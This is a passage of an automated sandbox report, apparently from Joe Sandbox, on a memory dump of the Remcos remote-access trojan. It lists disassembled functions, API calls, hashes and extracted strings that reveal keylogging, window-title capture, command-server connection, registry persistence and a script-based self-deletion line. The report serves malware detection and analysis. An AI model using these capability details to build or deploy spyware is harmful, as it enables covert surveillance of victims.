                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040E9EE
                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                        • API String ID: 2830904901-2361045106
                                        • Opcode ID: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                        • Opcode Fuzzy Hash: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                        Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-415197 WSAGetLastError call 41cae1 533->561 567 415210-415225 call 404f51 call 4048c8 560->567 568 4151e5-41520b call 402093 * 2 call 41b4ef 560->568 564 41519c-4151d0 call 4052fd call 402093 call 41b4ef call 401fd8 561->564 583 415aa3-415ab5 call 404e26 call 4021fa 564->583 567->583 584 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 567->584 568->583 596 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 583->596 597 415add-415ae5 call 401e8d 583->597 648 415380-41538d call 405aa6 584->648 649 415392-4153b9 call 401fab call 4135a6 584->649 596->597 597->477 648->649 655 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->655 656 4153bb-4153bd 649->656 901 415a0f-415a16 655->901 656->655 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->583
                                        APIs
                                        • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                        • Sleep.KERNELBASE(00000000,00000002), ref: 00415AD7
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ErrorLastLocalTime
                                        • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                        • API String ID: 524882891-1970491740
                                        • Opcode ID: 9cb82891bb425c39d1cf50534c3eac14595e9723053b020adc359de55693d3f0
                                        • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                        • Opcode Fuzzy Hash: 9cb82891bb425c39d1cf50534c3eac14595e9723053b020adc359de55693d3f0
                                        • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                        Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 0040A740
                                          • Part of subcall function 0040A675: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                          • Part of subcall function 0040A675: CloseHandle.KERNELBASE(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                        • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A77C
                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 0040A78D
                                        • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040A7A4
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                        • API String ID: 3795512280-1152054767
                                        • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                        • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                        Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1028 404a21-404a2f WSAGetLastError 1024->1028 1029 404a97 1024->1029 1026 404a17-404a19 1025->1026 1027 4048f7-4048fa 1025->1027 1030 404a99-404a9e 1026->1030 1031 404926-404930 call 420c60 1027->1031 1032 4048fc-404923 call 40531e call 402093 call 41b4ef 1027->1032 1028->1029 1033 404a31-404a34 1028->1033 1029->1030 1042 404941-40494e call 420e8f 1031->1042 1043 404932-40493c 1031->1043 1032->1031 1036 404a71-404a76 1033->1036 1037 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1033->1037 1039 404a7b-404a94 call 402093 * 2 call 41b4ef 1036->1039 1037->1029 1039->1029 1056 404950-404973 call 402093 * 2 call 41b4ef 1042->1056 1057 404987-404992 call 421a40 1042->1057 1043->1039 1086 404976-404982 call 420ca0 1056->1086 1069 4049c4-4049d1 call 420e06 1057->1069 1070 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1057->1070 1080 4049d3-4049f6 call 402093 * 2 call 41b4ef 1069->1080 1081 4049f9-404a14 CreateEventW * 2 1069->1081 1070->1086 1080->1081 1081->1026 1086->1029
                                        APIs
                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                        • API String ID: 994465650-2151626615
                                        • Opcode ID: 0e1f48393a4dbf35559e3b54531825a3ac2d5840eb8be2a17852ea70254c2e78
                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                        • Opcode Fuzzy Hash: 0e1f48393a4dbf35559e3b54531825a3ac2d5840eb8be2a17852ea70254c2e78
                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                        Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                        • CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                        • String ID:
                                        • API String ID: 3658366068-0
                                        • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                        • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                        Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                                        • Sleep.KERNELBASE(000001F4), ref: 0040AD43
                                        • GetForegroundWindow.USER32 ref: 0040AD49
                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                        • String ID: [${ User has been idle for $ minutes }$]
                                        • API String ID: 911427763-3954389425
                                        • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                        • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                        Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1195 40da34-40da59 call 401f86 1198 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1195->1198 1199 40da5f 1195->1199 1220 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1198->1220 1200 40da70-40da7e call 41b5b4 call 401f13 1199->1200 1201 40da91-40da96 1199->1201 1202 40db51-40db56 1199->1202 1203 40daa5-40daac call 41bfb7 1199->1203 1204 40da66-40da6b 1199->1204 1205 40db58-40db5d 1199->1205 1206 40da9b-40daa0 1199->1206 1207 40db6e 1199->1207 1208 40db5f-40db6c call 43c0cf 1199->1208 1229 40da83 1200->1229 1210 40db73-40db78 call 43c0cf 1201->1210 1202->1210 1221 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1203->1221 1222 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1203->1222 1204->1210 1205->1210 1206->1210 1207->1210 1208->1207 1223 40db79-40db7e call 409057 1208->1223 1210->1223 1221->1229 1234 40da87-40da8c call 401f09 1222->1234 1223->1198 1229->1234 1234->1198
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LongNamePath
                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 82841172-425784914
                                        • Opcode ID: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                        • Opcode Fuzzy Hash: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                        Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1295 41c3f1-41c402 1296 41c404-41c407 1295->1296 1297 41c41a-41c421 1295->1297 1299 41c410-41c418 1296->1299 1300 41c409-41c40e 1296->1300 1298 41c422-41c43b CreateFileW 1297->1298 1301 41c441-41c446 1298->1301 1302 41c43d-41c43f 1298->1302 1299->1298 1300->1298 1304 41c461-41c472 WriteFile 1301->1304 1305 41c448-41c456 SetFilePointer 1301->1305 1303 41c47f-41c484 1302->1303 1307 41c474 1304->1307 1308 41c476-41c47d CloseHandle 1304->1308 1305->1304 1306 41c458-41c45f CloseHandle 1305->1306 1306->1302 1307->1308 1308->1303
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C44D
                                        • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                        • CloseHandle.KERNELBASE(00000000), ref: 0041C477
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreatePointerWrite
                                        • String ID: hpF
                                        • API String ID: 1852769593-151379673
                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                        Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1309 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1320 41b35d-41b366 1309->1320 1321 41b31c-41b32b call 4135a6 1309->1321 1323 41b368-41b36d 1320->1323 1324 41b36f 1320->1324 1326 41b330-41b347 call 401fab StrToIntA 1321->1326 1325 41b374-41b37f call 40537d 1323->1325 1324->1325 1331 41b355-41b358 call 401fd8 1326->1331 1332 41b349-41b352 call 41cf69 1326->1332 1331->1320 1332->1331
                                        APIs
                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                        • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCurrentOpenProcessQueryValue
                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 1866151309-2070987746
                                        • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                        • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                        Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1383 40a675-40a685 1384 40a722-40a725 1383->1384 1385 40a68b-40a68d 1383->1385 1386 40a690-40a6b6 call 401f04 CreateFileW 1385->1386 1389 40a6f6 1386->1389 1390 40a6b8-40a6c6 GetFileSize 1386->1390 1391 40a6f9-40a6fd 1389->1391 1392 40a6c8 1390->1392 1393 40a6ed-40a6f4 CloseHandle 1390->1393 1391->1386 1394 40a6ff-40a702 1391->1394 1395 40a6d2-40a6d9 1392->1395 1396 40a6ca-40a6d0 1392->1396 1393->1391 1394->1384 1397 40a704-40a70b 1394->1397 1398 40a6e2-40a6e7 Sleep 1395->1398 1399 40a6db-40a6dd call 40b0dc 1395->1399 1396->1393 1396->1395 1397->1384 1400 40a70d-40a71d call 40905c call 40a179 1397->1400 1398->1393 1399->1398 1400->1384
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                        • CloseHandle.KERNELBASE(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSizeSleep
                                        • String ID: XQG
                                        • API String ID: 1958988193-3606453820
                                        • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                        • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                        Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTimewsprintf
                                        • String ID: Offline Keylogger Started
                                        • API String ID: 465354869-4114347211
                                        • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                        • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                        Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                        • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                        • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                        • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                        Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
